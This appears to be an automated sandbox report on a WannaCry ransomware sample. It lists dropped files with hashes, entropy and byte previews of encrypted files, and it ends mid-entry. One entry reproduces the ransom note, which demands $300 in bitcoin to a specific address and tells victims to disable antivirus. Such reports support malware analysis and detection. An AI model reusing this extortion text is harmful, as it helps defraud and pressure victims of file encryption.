                                                                              Malicious:true
                                                                              Preview:BIF....Kwdi...g2.}p.kn.z....R."...b..o@oVj.(...*x.=q....w0H..ATr..?v...........kl...+..p.C>.+...!]..J4.D.6..9..?.M..{:J...|.u..Z%.=.W.....R..q.ls.....m..V6'....o..).j.O...{.\..P.&.s6~!f.3.V#..g.=`O...?.W...@....R..\...n....B..!..*.VA..........*..@.ws[.1B.G..1<..,.b..=$....:..w..(.|Q.....2.N....w......G....z.V.....1...+E...$.e.W...#.u.../X...Qvy.1c.+.KJ.....(h3-...0m..av.....0m.Nr..+j./gV'x.%M;.q7.....T.....{.....\.X...X...$.:.e.#J..*.>.......C.;.n......d...G..._.V.7[....[v..."...v.G.....}O~.B...}..^.........kK....}...j....C.p..s.3...R..o.n..!D...Y9]F..T...Y..(..w9._....=E.[B...s><`*D..ll..8.0_$...........+...t.*~Z@..~...g.v....KR.....:i~>..;Z".w..S...R...`Kq}D.Z........AWK....Vw........eN.....A.*..ef.............fD...u.kLy.-w. .8'i.......8.*F.8......V..h.....r(..I$[a#.....x...-2O.....fC.....V.-.h.m.?..S.A 7!....v..3.,..j..f,7.m..........i<.,R..=}....Z.k_.H..3"....N...o...^.i.g.t64+..C. .>..^.]...2Y../..67...1h<D.....H..0...W..g..{.....J..h`.Q
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852195378979607
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkmfeNl+QuHgDN+5dyBhlEZlcMjbob7F4Ps6CBc4b3pq/h84:bkBhDN+5CYl74F4QcQpq/h84
                                                                              MD5:C12E08D2DCF93BAD7C26454A22863B23
                                                                              SHA1:BF1F2FB4B59139326FE7ACE898D4AA088C3319B9
                                                                              SHA-256:4C69F76CA91EC3EDC3A177AC7FFFBCE53E6E7C84D0847D3D56948F939F809213
                                                                              SHA-512:425D2BC0DA89DDAF38FBEA5745504A26DF64CF37ADB743DB0FE9262565474C76437B5EBD23812AA699EDCC7AABC90C71C48FDBB4F046F48E14253B8C4D12C4AF
                                                                              Malicious:false
                                                                              Preview:WANACRY!....N..A..o..'.W.m..M...._p;\..#C.8V~..[...7a..1._9.F}..b...-...3h.............a.$.d=....Q....8...29.e........".......\.7...l..IX..2....].......&.!+.~.s...P..y..@.5s.|T.z...3.....#....z ..a"2.$B.S-....B.|.t.g.._..F....u..OS.G..4..w.=.7;....5T.F2.............`7..#0......L....F_.R..H..&..2.B.....h-.C.F.Ca.B.;...&.C...T..q].h.$...Z.....X..v..i...O....kE.p...+...@p_.j..<d......'ci.K.S...v....Z.0.J..E....a.{.v.T..|.8.;=..t.bLA.I..t..=e%m..].[.O.J...U..q7.uJ_..n3...h.r8*..G.......VK.r.....J....e}..?.M.G..).>..J.......r.Gx....SO..t.W2......8x._[j.....;..Dg!f.u.].g\-_.O..#",.H"rb..@[.%:.W`._..LR.....-......k^..].....nB./..}lV....P.d..W.9.R..-0.O..=..|.I.p..D....`.y...LK......h..i.e....F.\h......".*D..<5..dD@>..../..H.0....*=?[.".g..G....&.............U.jM.@....)K0...Mm.L!...aX+G...N.'..J...6..<E<...D......X.x...qZ..N..y. ..>r..2..`ao...;..)..lM....P+.#gUh..4...J..#F^.<..."P:.lr?D9..[...f.`.I.n5.._..g.o!XAA....S...+..o.X#i..Z~P..N..^.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852195378979607
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkmfeNl+QuHgDN+5dyBhlEZlcMjbob7F4Ps6CBc4b3pq/h84:bkBhDN+5CYl74F4QcQpq/h84
                                                                              MD5:C12E08D2DCF93BAD7C26454A22863B23
                                                                              SHA1:BF1F2FB4B59139326FE7ACE898D4AA088C3319B9
                                                                              SHA-256:4C69F76CA91EC3EDC3A177AC7FFFBCE53E6E7C84D0847D3D56948F939F809213
                                                                              SHA-512:425D2BC0DA89DDAF38FBEA5745504A26DF64CF37ADB743DB0FE9262565474C76437B5EBD23812AA699EDCC7AABC90C71C48FDBB4F046F48E14253B8C4D12C4AF
                                                                              Malicious:false
                                                                              Preview:WANACRY!....N..A..o..'.W.m..M...._p;\..#C.8V~..[...7a..1._9.F}..b...-...3h.............a.$.d=....Q....8...29.e........".......\.7...l..IX..2....].......&.!+.~.s...P..y..@.5s.|T.z...3.....#....z ..a"2.$B.S-....B.|.t.g.._..F....u..OS.G..4..w.=.7;....5T.F2.............`7..#0......L....F_.R..H..&..2.B.....h-.C.F.Ca.B.;...&.C...T..q].h.$...Z.....X..v..i...O....kE.p...+...@p_.j..<d......'ci.K.S...v....Z.0.J..E....a.{.v.T..|.8.;=..t.bLA.I..t..=e%m..].[.O.J...U..q7.uJ_..n3...h.r8*..G.......VK.r.....J....e}..?.M.G..).>..J.......r.Gx....SO..t.W2......8x._[j.....;..Dg!f.u.].g\-_.O..#",.H"rb..@[.%:.W`._..LR.....-......k^..].....nB./..}lV....P.d..W.9.R..-0.O..=..|.I.p..D....`.y...LK......h..i.e....F.\h......".*D..<5..dD@>..../..H.0....*=?[.".g..G....&.............U.jM.@....)K0...Mm.L!...aX+G...N.'..J...6..<E<...D......X.x...qZ..N..y. ..>r..2..`ao...;..)..lM....P+.#gUh..4...J..#F^.<..."P:.lr?D9..[...f.`.I.n5.._..g.o!XAA....S...+..o.X#i..Z~P..N..^.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 05:43:20 2024, mtime=Fri Oct 4 05:43:20 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):577
                                                                              Entropy (8bit):5.1553023194242416
                                                                              Encrypted:false
                                                                              SSDEEP:12:81ypzYNbVUthZsUoBjAuvUuHwoOXhicmV:81BImAO96Fm
                                                                              MD5:9B3A32817BC73D079076C7A433BFD223
                                                                              SHA1:ECB0EAF1C2D33A065EAD7E1CC26B1293BB2BC7A7
                                                                              SHA-256:12F9DBE08D1AA086B674A0CFFAD10F11FDC79664CBF5139B9B609D05197228B5
                                                                              SHA-512:CD59012398BA9D25D19F76689222451A32A13D1A79CFEB7B58ED152F121A180CC3A10283ECB32922DA99F162972E0D50CF1C28061D35A11130DFE82B4EAE5702
                                                                              Malicious:false
                                                                              Preview:L..................F.... ......(...c4.(....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......}}.9....7.(....&..(.....t.2......J.2 .@WANAD~1.EXE..X......DYk5DYk5..............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........s3.T.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......066656...........hT..CrF.f4... .F..F...../....%..hT..CrF.f4... .F..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.779129717038513
                                                                              Encrypted:false
                                                                              SSDEEP:24:NdcqskyDWjmWsLXXMDgx/EksMoqR/80/G:NdukyDUJi8DuEkvTG
                                                                              MD5:AE301426493B122688F899ED77FEAE79
                                                                              SHA1:331FA746CF28BC38EE34B6D7C2D99E41A6076A49
                                                                              SHA-256:92F7E7C414547CDCC387F990511BA69F1ABBAF6FBF4C2F6A29C2664FEC210DE1
                                                                              SHA-512:31B810D17AB676A0D20A2747F3123F3E0EE31B36387D1C7BD8D57B069D585D69255ED9CBD138CC340FAA5BFB41A45D8E60565F2A59563118245F1C79F7465E32
                                                                              Malicious:false
                                                                              Preview:...6.I.pq.*.....gX.5...h.Y..M...e....[..O/)...i...?.2...VjL.. ...s.~.....&*.......D..[(m0....R$....9.dB.......U.....!+...D2.y.<".....8...........l.JW.M.W.e+!..U..+D.....yM.9.~n.Nm...# W.....$.rZ.tx.+W...`.]._.\Z.gy(..?.d.24..b?@.J...+....Evg.7g........L.......J/.,.#... z...3........9...!...-#c.2u.?W6...g..@,:>>.TP..E.l.Z.......#4H9.N...Z. .l.J.4....lX.........v.)t.J.d{..E..z......?).....NJFH:..%u(-...x......4xTK.Q.._.b.....M/....d4g1k.*N..<..mh...^..E...T.......w.Ct~R......Q.........?.T...m;2.V..9JV...9...........k..U...R..N..-...\...D~.[JR$.T........t}.`.z........l..f........E..I..K.nam..;_...0..x..P..>..f..F.u.=Pj.....u.G..2..].@.)&U..4..k.....b.....Y......d...:xa.......?<.....|...w..m...?5........*x......F..p..Q6h.Sg......7:8...z..i.}.4u..J.W.....8.H.....T......ql1.0....M..|...[..x...16.*..t;.F..y. .U...E..:.`.o6.+........Q......wP.F..<..9...b"%,|;R].]..QH.W..Yp.)rd..........[T.yaSq@..:..C..|+.Y.....p......y^.`F<rr.v.....r..k[2
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.857579156994771
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkeEBU3lKfuvH9u4BOPN96ztXEjmkuxLNuQeMe0hnKHvZzbel3ZrPMtCgSnHw:bkf2VE6tOPmomk+LN1Hx1/PTQ
                                                                              MD5:BF0490015720078179B6B4EDE0AC9087
                                                                              SHA1:3EA217F662032881D0A548767DE7D621F550600E
                                                                              SHA-256:5FC3C430B1C94BB24B10F863E5292E6B01E3319B5141A98A4BB6C80DDE858F10
                                                                              SHA-512:180E1FB5EB7716D74890A357BDA8D8CC47B9FB583BEB3B487E5D02D16EA62EBF14599D6FDD2319F1917AC0B146890421B4F1CB1BA0BCF18B4D9B1C0757722E58
                                                                              Malicious:false
                                                                              Preview:WANACRY!....`.A....4E....H!|k..d?.$..kgH.4.fv.....%I.....Z>...3.+/P.6>.....7Y.!.R8....,Ml..^....6\.w...&......-i...dr...k..=.]...ZZ....w.q...]..\N....w.......nK....9..Ad~G$...{ i^......G...6...7j...z......x..<|A.e....0.w...WW.....u.........D.U........"................Z....O.p.,....?..z....=.....;!..x..7.....>...%...D4..s...E6..f0....i..Mje) ....k#...{%~..-..4.o.....).7@=.1q..Cj[..>........e.\G|s..E........._7J^....M.......;x...@'b.......p....Io.2x`..B.Q.qa..X..v.+U...6....i.uS.E...5G&.~a..]...Wl...#.!..h.5y.Z....0.a_?........-..-...x....k.tC$&..CE..].gV.@>..n.++, V.4k%.g.D...j.D...._.OVm .4..y....e9..i...._...0%._;..J...[.[..'....?<bm..g....9..ALVJ.O.~0m........E...3I.f.l0i..t=..y..dG...C......efMm .............../..(.m.....e@..?V....n..Z"...'rP..1..S.}.:..VjeOG....6Q.+.g...gT.....+.e.II.`.:...]f[.C...N....`......}w..m.Wtt....{AcB.....9RY.z..bqT..E...M....K...L?..(=|m.N..]..q.!.'|."M.u-.m....^&0..W....2W ...M..+.R..nA.<..V.W:...9)....Y.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.857579156994771
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkeEBU3lKfuvH9u4BOPN96ztXEjmkuxLNuQeMe0hnKHvZzbel3ZrPMtCgSnHw:bkf2VE6tOPmomk+LN1Hx1/PTQ
                                                                              MD5:BF0490015720078179B6B4EDE0AC9087
                                                                              SHA1:3EA217F662032881D0A548767DE7D621F550600E
                                                                              SHA-256:5FC3C430B1C94BB24B10F863E5292E6B01E3319B5141A98A4BB6C80DDE858F10
                                                                              SHA-512:180E1FB5EB7716D74890A357BDA8D8CC47B9FB583BEB3B487E5D02D16EA62EBF14599D6FDD2319F1917AC0B146890421B4F1CB1BA0BCF18B4D9B1C0757722E58
                                                                              Malicious:false
                                                                              Preview:WANACRY!....`.A....4E....H!|k..d?.$..kgH.4.fv.....%I.....Z>...3.+/P.6>.....7Y.!.R8....,Ml..^....6\.w...&......-i...dr...k..=.]...ZZ....w.q...]..\N....w.......nK....9..Ad~G$...{ i^......G...6...7j...z......x..<|A.e....0.w...WW.....u.........D.U........"................Z....O.p.,....?..z....=.....;!..x..7.....>...%...D4..s...E6..f0....i..Mje) ....k#...{%~..-..4.o.....).7@=.1q..Cj[..>........e.\G|s..E........._7J^....M.......;x...@'b.......p....Io.2x`..B.Q.qa..X..v.+U...6....i.uS.E...5G&.~a..]...Wl...#.!..h.5y.Z....0.a_?........-..-...x....k.tC$&..CE..].gV.@>..n.++, V.4k%.g.D...j.D...._.OVm .4..y....e9..i...._...0%._;..J...[.[..'....?<bm..g....9..ALVJ.O.~0m........E...3I.f.l0i..t=..y..dG...C......efMm .............../..(.m.....e@..?V....n..Z"...'rP..1..S.}.:..VjeOG....6Q.+.g...gT.....+.e.II.`.:...]f[.C...N....`......}w..m.Wtt....{AcB.....9RY.z..bqT..E...M....K...L?..(=|m.N..]..q.!.'|."M.u-.m....^&0..W....2W ...M..+.R..nA.<..V.W:...9)....Y.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.81582071214866
                                                                              Encrypted:false
                                                                              SSDEEP:24:E/JcOrIm4QbVE0YZtvX/dNm08MhN9PJJDd256yhKQi:EiOrSQ5feXSGPJRdHH
                                                                              MD5:E30EE4A4B02F1ECD40DA22C40437A303
                                                                              SHA1:F50460430B32181A2D4FD4026FE3C0D91464AB9C
                                                                              SHA-256:70E92D63B508F309D9A40E7229C8C4D727370F6579761649196ACEE2F1E415E8
                                                                              SHA-512:094C485528A29D2D01FE5EA4E6B357116F0D5004EE88282FB2B0C70F41C496DB8ACA9D96FA2F3CF5274CDEE85ECFA080A87E3BB57BD0017CED13C4D1E2620723
                                                                              Malicious:false
                                                                              Preview:....u.h....s4D.....l.5.h.b.V.t..\....fd.a..|..H.Kg....b.....3..8ni.1..._{.d.......\...F...M....An$.x7..d=.h.OI...y..Qz|..9..?..k..#...X...>...j..>.M.:....xrP.!.`.MIt*...{..f.....c....U...).`.5|.^^.3'.;J..R.k..^m.....OfC....j..?.#.!h.I..>e3o(.)W.G......C.FS+p....gs.J;....w..PlP...fu.+LH1.......,...'.Z.....i/Y~....+.&....dm.E..m..'.sU..A6.[.Zj.C0w.].J....%...!3.5....m.F.;9.r/.8N..|m+.h.A.'Q.RK..K.../.^.8W.o.....X..#...y...n`>.6e.J-y\.......Q8....j........6.*$.......l.bQjf\.....:..fR..;o&.]...w...\..Q(..w..k.-7.J...C$..2..a...g.U0.;...P.i..'(l../f<....3..%(C..-7......5..z.....:.1g.......u...... ...d.......sG....P...K*.. .\.....u./G.4......I.y. .et}>..Z..f..o../..p<._.f.z..~E.....%..U.!..K6....O.0$3...#Qg.....58....:.iL6...PD.:Z8[U..c.#WN[`.C..+...|.B.kT.`..#.OJ p.w.I.t..3..gnQ.[O...:.`..|e........`.ma"....#3.a.^[...[.?U....|......E"cS...Q..TrtoW4....O......#.7^..(....V(.B*......Q.7..x..p..8.4r...`.Z.C....F5.;.Df...%..3..(..zU.[8..q..7.(.c?
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8133657185134044
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkNwkDtzXYGCPdQU3vYPSGTz8uZojzp2KzEuQZE+K3KnBUpENMa03M8B/rLkJUY:bkaQtLrCPdBAPbzNWz8aEfRni5v/rLkH
                                                                              MD5:6287E8FD5EF2E766D37FDE17557CF6FA
                                                                              SHA1:2C82F28017A9BC882B358C1039673E83FFFCFF9B
                                                                              SHA-256:DFF7BD04F737DF0892CC35C8ADBBCC74A8D33F325D52C35FEE4939DCDBCAC5B9
                                                                              SHA-512:2CC93DBD1EEDB85B9FFDAFC2ADB7BA02A33C0D058418D330E5C6B7267C1697A1C51F63920C462A48B7B3E2D057053BA67958E09BEAB62624BB369B4B9BD62371
                                                                              Malicious:false
                                                                              Preview:WANACRY!....<..hF.>.J8..m..~^.OJn....3G....+....q.bs-....#..6...K`..E&.._.......C.........$1......<..SY.Qu...).............l'.....l..Rj.._...qB&...%.|.&.../.).....~.:.`u.P....}......%..P....l...d$)Y..4.d...0..3...m...-.f.at...i5..x.@.~gk.....L.=.8....>.............fh....h.p.Y...urxY-.(.(...PjMAX.!...Q1....+Z.o.d*...>.8\......59...$...9.....cR.AI.;.....q._.m0.j.....>.%.....a..s'.7-I..y.....&...8.@...F{.A.((Ne.CxF.!d...i.}.],T.....`a.7........L..)....C...z...G+y.M]b..5.....T....f7...._.."......u..........?..p..f.Pr..0'^|;K...^..j....%..d...x...X..w&.w*}....w.,*..zw.]y..u(.QR...a......'J.nI.....[...-F...].........[....X[7...gmo...|..}.....HY.......I......fi`....O.T.y.S#.#..oW.$.0fr.......~..._.S.L...j..}........x...?Y)."i...U..Q........D>.;....^h;..X...%.....4L..oN{Wr...."V%I.K!..<..xW..... ."Y+..G.Pz6.Ye..5.....S...@r.or.E5"H....'....5....;.'.I......S)..5.n.....7..k.._Eb.O.=&..DB</..!....z...s7K.]...Qx..*....a..i."l]b"..+o./4`..O.....d.4..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8133657185134044
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkNwkDtzXYGCPdQU3vYPSGTz8uZojzp2KzEuQZE+K3KnBUpENMa03M8B/rLkJUY:bkaQtLrCPdBAPbzNWz8aEfRni5v/rLkH
                                                                              MD5:6287E8FD5EF2E766D37FDE17557CF6FA
                                                                              SHA1:2C82F28017A9BC882B358C1039673E83FFFCFF9B
                                                                              SHA-256:DFF7BD04F737DF0892CC35C8ADBBCC74A8D33F325D52C35FEE4939DCDBCAC5B9
                                                                              SHA-512:2CC93DBD1EEDB85B9FFDAFC2ADB7BA02A33C0D058418D330E5C6B7267C1697A1C51F63920C462A48B7B3E2D057053BA67958E09BEAB62624BB369B4B9BD62371
                                                                              Malicious:false
                                                                              Preview:WANACRY!....<..hF.>.J8..m..~^.OJn....3G....+....q.bs-....#..6...K`..E&.._.......C.........$1......<..SY.Qu...).............l'.....l..Rj.._...qB&...%.|.&.../.).....~.:.`u.P....}......%..P....l...d$)Y..4.d...0..3...m...-.f.at...i5..x.@.~gk.....L.=.8....>.............fh....h.p.Y...urxY-.(.(...PjMAX.!...Q1....+Z.o.d*...>.8\......59...$...9.....cR.AI.;.....q._.m0.j.....>.%.....a..s'.7-I..y.....&...8.@...F{.A.((Ne.CxF.!d...i.}.],T.....`a.7........L..)....C...z...G+y.M]b..5.....T....f7...._.."......u..........?..p..f.Pr..0'^|;K...^..j....%..d...x...X..w&.w*}....w.,*..zw.]y..u(.QR...a......'J.nI.....[...-F...].........[....X[7...gmo...|..}.....HY.......I......fi`....O.T.y.S#.#..oW.$.0fr.......~..._.S.L...j..}........x...?Y)."i...U..Q........D>.;....^h;..X...%.....4L..oN{Wr...."V%I.K!..<..xW..... ."Y+..G.Pz6.Ye..5.....S...@r.or.E5"H....'....5....;.'.I......S)..5.n.....7..k.._Eb.O.=&..DB</..!....z...s7K.]...Qx..*....a..i."l]b"..+o./4`..O.....d.4..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.814961811172585
                                                                              Encrypted:false
                                                                              SSDEEP:24:JiI3ozGdlggQKVFUJw7W/YUjJuU+FxCdgjL79vRzf6U:Ji68GdlggPVFqwW/FYU0wK3795z6U
                                                                              MD5:4C81BBD2367B8AD70B6952C4DD4E9629
                                                                              SHA1:035D7B2E34D8DAB9263E3B59E3C9F151CAEB23F8
                                                                              SHA-256:CBD4F844FDCB94095E0F6850AF3506B9D47C6078BCCE9ED5EB72D932D9536191
                                                                              SHA-512:9F00E3312DABDBD82AEF9C062C782DFEF8BDEA723EBECCD97EB869D5FAC72BEBA512F2128CF6F37E45680C90C60AED6A2EE655122B7EE44EE1D58174AEE87E17
                                                                              Malicious:false
                                                                              Preview:..VUW....P...r.+o7T.w.3..j.f,u..M..nw.{]aC......u .2[.FT.+.._'...._..c5%c....H....:>..%.0-D0RPp0..........4...K....Z.<V.....(V..#..?....:......NN..p.'... 2dw...!.l...[.C..i..3~p]...V...y.......m.1..M....o.P.L.8......A...H.E..x....U.9.G7ZR....m..Bob.3......B.>...j....!07.. m.A..)..(..........-..!..B'ap4.`#...].C. .a...+.......x..8........(...pz..S....j...q.u..Vu}.(.tv'7^...b.."F...'..C.j~V.kby3.~b..[fj7..n....!....~.N...`G....&~..,..2g.].#d.....M'.1..*$XH.....:.nRai".Z%.V..!....rV..`.zubA...K...4..W.T.Q.b.gf.iXx.{..{A 31...P..X.\..xeYq.....*...T..r...9..:.8|v.....V..|..v.O..CI2mz.y.6l.. ..{.........Cc..c1.....7;..,U..;...ra..#...E.....[R.\.</.....{%...&:B.?.k...??-.%}...l...r.Yq`.o._..v......_.A[0.w.qN.r....s..)$.c\..X..V.2.$.f(.-.,..r..R.`!o.C./LU...Z.`I..../.I...v.....G....0..yJ.'o./..A.......l.......*..R......0.......O..?L.".kC>-).A...6.&.....4.....iW..xq....m..z1L...T.2ek.1..].....*8..K......\i.k2C.X........e.|...'U.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852261810035848
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk58lVygcWTopcbPoXbC5a7D0buidspjKCRJxU9cETFND:bkOCgbTHvyDgDoZdCj
                                                                              MD5:7CB75C7C6A128647F1C741385729A2D4
                                                                              SHA1:1757BA450D86A1B619CD0F5B119ED8D3B8497064
                                                                              SHA-256:5AFAC5A7648D6E9AF32F91CFB4EF6BEBCB3FCE1C7130AE935ED155EB5A52EE47
                                                                              SHA-512:D1E36CEB5F8DA5B2EB08D87F8069429CA68163ABD6287711D3D32371C5F8AE46C6EA54490493B1538AF2FC20FC84B839B15BC5A6D7814B9B7383DEA2EB273371
                                                                              Malicious:false
                                                                              Preview:WANACRY!........a..o.....+S.~]..5&...9...Z..c.....j..2k?..E".T..v.k..6rQ.NE.3...'m...C7..?S..[.;.^h.".&....../.I.v.....D....a6.......-._....../.$.$4..R.j..$.f...Y.}[X...:.r.+.Or.c4^..2...[8:..#.. .RS.:..{..{.tz#...6...l..u...........j.!_2......09.}5...r.....................0.._.k.P.I*u."....j.n.(...g]....^.F..8m=.X= ..3..?o...l6.x..4M.`+%s.3.t...z..8....I..q....\K.P..t.D.......|..V...8.VUd-|...cW.\....ohO.f~4..W.....}f."G.f.....X....V,p..tm#`...('!GF/?...>.\...o..wO.zr*.....".^.c_..........is.Z......l....)....^..>a......f......y>..^..o..?...jFY.]..v....MN.*S.*../Qw....`%G...^.9...q..e\X......^.....R.#.....$...7.........A.....).7B......eL...`uX..>s.......Z.....UH..I.........o..B...2...|..~.....B..E...'..KF.HF..K.w'Q..Y.j.l.;.~..5...I.).j ..4J..(....aF>.....A.)..w.*.h.P.?o.1:.S8..$....u....B.....fs...."x-..}.#.8g.(W}.5.I.._\C.u.i3.W.......nMS.@.9..b..".q...iI'.&&.....R.$5.(.r.<a..H.qa.4:1.H..!.......z.h.....i.ty ....|.F..}.d&.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852261810035848
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk58lVygcWTopcbPoXbC5a7D0buidspjKCRJxU9cETFND:bkOCgbTHvyDgDoZdCj
                                                                              MD5:7CB75C7C6A128647F1C741385729A2D4
                                                                              SHA1:1757BA450D86A1B619CD0F5B119ED8D3B8497064
                                                                              SHA-256:5AFAC5A7648D6E9AF32F91CFB4EF6BEBCB3FCE1C7130AE935ED155EB5A52EE47
                                                                              SHA-512:D1E36CEB5F8DA5B2EB08D87F8069429CA68163ABD6287711D3D32371C5F8AE46C6EA54490493B1538AF2FC20FC84B839B15BC5A6D7814B9B7383DEA2EB273371
                                                                              Malicious:false
                                                                              Preview:WANACRY!........a..o.....+S.~]..5&...9...Z..c.....j..2k?..E".T..v.k..6rQ.NE.3...'m...C7..?S..[.;.^h.".&....../.I.v.....D....a6.......-._....../.$.$4..R.j..$.f...Y.}[X...:.r.+.Or.c4^..2...[8:..#.. .RS.:..{..{.tz#...6...l..u...........j.!_2......09.}5...r.....................0.._.k.P.I*u."....j.n.(...g]....^.F..8m=.X= ..3..?o...l6.x..4M.`+%s.3.t...z..8....I..q....\K.P..t.D.......|..V...8.VUd-|...cW.\....ohO.f~4..W.....}f."G.f.....X....V,p..tm#`...('!GF/?...>.\...o..wO.zr*.....".^.c_..........is.Z......l....)....^..>a......f......y>..^..o..?...jFY.]..v....MN.*S.*../Qw....`%G...^.9...q..e\X......^.....R.#.....$...7.........A.....).7B......eL...`uX..>s.......Z.....UH..I.........o..B...2...|..~.....B..E...'..KF.HF..K.w'Q..Y.j.l.;.~..5...I.).j ..4J..(....aF>.....A.)..w.*.h.P.?o.1:.S8..$....u....B.....fs...."x-..}.#.8g.(W}.5.I.._\C.u.i3.W.......nMS.@.9..b..".q...iI'.&&.....R.$5.(.r.<a..H.qa.4:1.H..!.......z.h.....i.ty ....|.F..}.d&.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.816302414966488
                                                                              Encrypted:false
                                                                              SSDEEP:24:FF37to1SQukM5IaItYOSklOvVViFCt1gn5Ygem5RyXHNDqAbdeEa:R/kIIaSYPklO+FCt6YvHMAcX
                                                                              MD5:38F7DF00FF43BE76DE8BAEE7B17FBCA1
                                                                              SHA1:B2FA1A084B933B89EE73C1AF7CB2726A966E0BD8
                                                                              SHA-256:78E16A7E5FEC24EE04A66D8881A25483479CD7A860F3533B66D935115427D4CB
                                                                              SHA-512:62BC4C1220398B0ADF1B5C3DC78A4C0FEB3CBFCA110371D91C509A0539963FB1A7C1146AB772EE41BA01654CA329FFB10B39C90FC88015288A6751EA9C74BFF4
                                                                              Malicious:false
                                                                              Preview:~.1....s.j?.....j.Q....VG...<..8..`...8..... ...Cz.y..Y....~e*.'.}....B."4..:.S.....or2P.H............(T]..+6.m...$!!.....IY....W..5bD...=..&<L.?/.|.-);.=B,T......7.,m..i........c_..k...%....:.......h[..{..=Xe....%....x~l..L..o....f.~.D"...$..g..}5.....^2..2E.g.) ...n.h.0.m..I..qHx..%kZ.2p..={...N..-...x.!.D4-.2.+.?_n.X+6.K..(..7......^;..z.u......y..b.~g.*..5.%S:.....j(..`O..m]..|K#..x.1>.}.\.......L...4..m...p.;..Q5...V....,...&0M.J.i.y..'9..........l..d.....%d..4.)........n..g..")'.?d%.~.3qd..;4.m.5....)u].;....%3.g.G.l.CM...o.....G)[c(..W..un...3H...k...HY.....K.jM.s&..=..P.3.........u.%.d8.........C)fN.C.....5.<.O....d.'....3I. .{a).zxy...!M_g.8..C|H..O.u.......N...x.Ik...:...ag.f.r.cR#$.......E.u [.P.?.B...l.Zv. .H}.....\7......P..c.ZJ........=.mU.6..B-Y,..(K...... #.u..G6.6=Z'...Mkb@.AB.}....2.4...&7.....s..I...O.$..s..i.u'.&P..18h.4..1..<c.2....9idF.Fb.x......cYZ{........ ..j.~...FLA.........N....:..A...o6..@Jt.q
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84883560288963
                                                                              Encrypted:false
